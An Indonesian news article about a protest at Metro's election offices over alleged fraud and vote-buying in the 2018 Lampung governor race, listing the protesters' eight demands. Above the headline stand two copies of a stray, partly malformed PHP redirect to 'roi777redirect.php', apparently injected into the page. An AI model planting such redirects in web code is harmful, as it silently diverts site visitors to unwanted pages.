header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Massa Datangi Kantor KPU dan Panwaslu Metro, ini Tuntutanya.. -
Massa Datangi Kantor KPU dan Panwaslu Metro, ini Tuntutanya..

TRANSLAMPUNG.COM, METRO – Aksi massa yang mengatasnamakan diri dari Maklumat Masyarakat Metro Peduli Pilgub Lampung 2018 mendatangi Kantor KPU Metro dan Panwaslu Metro rencananya massa juga akan mendatangi kantor DPRD Kota Metro.

Aksi massa ini mengerahkan kurang lebihnya 200 orang, Kamis pagi (12/7/2018). Dalam aksinya sebelumnya titik kumpul di Taman Merdeka Kota Metro, kemudian bergerak menuju kantor KPU Metro dan kantor Panwaslu Metro.

Ada 8 tuntutan yang disuarakan oleh aksi massa, antara lain:

1. Pemilihan Gubernur Lampung 2018 penuh kecurangan secara terstruktur, masif dan sistematis.

2. Terjadi pembagian sembako, jutaan lembar kain sarung, dan ratusan milyar dalam bentuk amplop “Serangan Fajar” untuk merayu masyarakat lampung dalam memilih arinal nunik yang disponsori oleh perusahaan Gula.

3. Nasib masyarakat lampung tergadaikan karena cagub arinal nunik harus hutang ke perusahaan “Tebu”.

4. HGU perusahaan tebu akan habis dan indikasinya akan terjadi pengambilan tanah adat masyarakat apabila gubernur dilantik.

5. Manisnya janji politik arinal nunik tidak akan terealisasi karena “Hutang” ke perusahaan yang jumlahnya sampai Trilyunan Rupiah selama proses pilgub 2018.

6. Bongkar konspirasi antara penyelenggara pemilu yang terkesan mendiamkan kecurangan-kecurangan pilgub 2018.

7. Tolak pelantikan arinal nunik sebagai Gubernur boneka perusahaan tebu.

8. Hanya ada satu kata, Lawan….!!!! (suf)

News Reporter